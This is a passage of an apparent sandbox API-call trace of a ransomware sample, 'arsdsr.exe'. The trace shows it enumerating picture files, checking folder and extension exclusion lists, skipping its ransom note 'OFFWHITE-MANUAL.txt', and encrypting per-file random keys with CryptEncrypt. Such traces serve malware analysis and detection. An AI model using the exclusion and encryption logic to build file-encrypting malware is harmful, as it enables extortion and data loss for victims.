lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae359dff, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae359dff, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc8bbb3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2=".") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="..") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="...") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="windows") returned -1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="$recycle.bin") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="rsa") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="ntuser.dat") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="programdata") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="appdata") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="program files") returned 1 [0146.713] lstrcmpiW (lpString1="usertile19.bmp", lpString2="program files (x86)") returned 1 [0146.713] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.713] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile19.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" [0146.714] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.714] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.714] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.714] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.714] lstrcmpiW (lpString1="usertile19.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.714] GetProcessHeap () returned 0x500000 [0146.714] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547038 [0146.714] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.714] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.715] GetProcessHeap () returned 0x500000 [0146.715] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546c98 [0146.715] GetProcessHeap () returned 0x500000 [0146.715] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546cb0 [0146.715] GetProcessHeap () returned 0x500000 [0146.715] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561a70 [0146.715] GetProcessHeap () returned 0x500000 [0146.715] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561b78 [0146.715] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.715] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.715] SystemFunction036 (in: RandomBuffer=0x546c98, RandomBufferLength=0x10 | out: RandomBuffer=0x546c98) returned 1 [0146.715] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.715] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.715] SystemFunction036 (in: RandomBuffer=0x546cb0, RandomBufferLength=0x10 | out: RandomBuffer=0x546cb0) returned 1 [0146.715] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.715] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.715] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561a70*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561a70*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.715] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.715] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.715] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561b78*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561b78*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.716] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.716] SetLastError (dwErrCode=0x0) [0146.716] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561a70, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.716] GetLastError () returned 0x6 [0146.716] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae37ff5c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae37ff5c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdccb1d11, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2=".") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="..") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="...") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="windows") returned -1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="$recycle.bin") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="rsa") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="ntuser.dat") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="programdata") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="appdata") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="program files") returned 1 [0146.716] lstrcmpiW (lpString1="usertile20.bmp", lpString2="program files (x86)") returned 1 [0146.716] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.716] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile20.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" [0146.716] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.716] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.716] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0146.716] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.716] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.716] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.716] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.717] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.717] lstrcmpiW (lpString1="usertile20.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.717] GetProcessHeap () returned 0x500000 [0146.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547048 [0146.717] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.717] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.717] GetProcessHeap () returned 0x500000 [0146.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546cc8 [0146.717] GetProcessHeap () returned 0x500000 [0146.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546ce0 [0146.717] GetProcessHeap () returned 0x500000 [0146.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561c80 [0146.717] GetProcessHeap () returned 0x500000 [0146.717] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561d88 [0146.717] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.717] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.718] SystemFunction036 (in: RandomBuffer=0x546cc8, RandomBufferLength=0x10 | out: RandomBuffer=0x546cc8) returned 1 [0146.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.718] SystemFunction036 (in: RandomBuffer=0x546ce0, RandomBufferLength=0x10 | out: RandomBuffer=0x546ce0) returned 1 [0146.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.718] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561c80*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561c80*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.718] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.718] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.718] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561d88*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561d88*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.718] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.718] SetLastError (dwErrCode=0x0) [0146.718] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561c80, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.718] GetLastError () returned 0x6 [0146.718] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd069f3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2=".") returned 1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2="..") returned 1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2="...") returned 1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2="windows") returned -1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2="$recycle.bin") returned 1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2="rsa") returned 1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2="ntuser.dat") returned 1 [0146.718] lstrcmpiW (lpString1="usertile21.bmp", lpString2="programdata") returned 1 [0146.719] lstrcmpiW (lpString1="usertile21.bmp", lpString2="appdata") returned 1 [0146.719] lstrcmpiW (lpString1="usertile21.bmp", lpString2="program files") returned 1 [0146.719] lstrcmpiW (lpString1="usertile21.bmp", lpString2="program files (x86)") returned 1 [0146.719] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.719] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile21.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" [0146.720] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.720] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.720] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.720] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.720] lstrcmpiW (lpString1="usertile21.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.720] GetProcessHeap () returned 0x500000 [0146.720] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547058 [0146.720] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.720] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.721] GetProcessHeap () returned 0x500000 [0146.721] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546cf8 [0146.721] GetProcessHeap () returned 0x500000 [0146.721] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546d10 [0146.721] GetProcessHeap () returned 0x500000 [0146.721] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561e90 [0146.721] GetProcessHeap () returned 0x500000 [0146.721] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561f98 [0146.721] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.721] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.721] SystemFunction036 (in: RandomBuffer=0x546cf8, RandomBufferLength=0x10 | out: RandomBuffer=0x546cf8) returned 1 [0146.721] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.721] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.721] SystemFunction036 (in: RandomBuffer=0x546d10, RandomBufferLength=0x10 | out: RandomBuffer=0x546d10) returned 1 [0146.721] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.721] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.721] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561e90*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561e90*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.721] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.721] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.721] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561f98*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561f98*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.721] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.721] SetLastError (dwErrCode=0x0) [0146.721] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561e90, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.722] GetLastError () returned 0x6 [0146.722] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd09009d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2=".") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="..") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="...") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="windows") returned -1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="$recycle.bin") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="rsa") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="ntuser.dat") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="programdata") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="appdata") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="program files") returned 1 [0146.722] lstrcmpiW (lpString1="usertile22.bmp", lpString2="program files (x86)") returned 1 [0146.722] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.722] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile22.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" [0146.722] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.722] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.722] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.722] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.723] lstrcmpiW (lpString1="usertile22.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.723] GetProcessHeap () returned 0x500000 [0146.723] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547068 [0146.723] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.727] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.727] GetProcessHeap () returned 0x500000 [0146.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546d28 [0146.727] GetProcessHeap () returned 0x500000 [0146.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546d40 [0146.727] GetProcessHeap () returned 0x500000 [0146.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5620a0 [0146.727] GetProcessHeap () returned 0x500000 [0146.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5621a8 [0146.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.727] SystemFunction036 (in: RandomBuffer=0x546d28, RandomBufferLength=0x10 | out: RandomBuffer=0x546d28) returned 1 [0146.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.727] SystemFunction036 (in: RandomBuffer=0x546d40, RandomBufferLength=0x10 | out: RandomBuffer=0x546d40) returned 1 [0146.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.727] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5620a0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5620a0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.728] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5621a8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5621a8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.728] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.728] SetLastError (dwErrCode=0x0) [0146.728] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5620a0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.728] GetLastError () returned 0x6 [0146.728] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3cc216, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3cc216, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd0b61fb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2=".") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="..") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="...") returned 1 [0146.728] lstrcmpiW (lpString1="usertile23.bmp", lpString2="windows") returned -1 [0146.728] lstrcmpiW 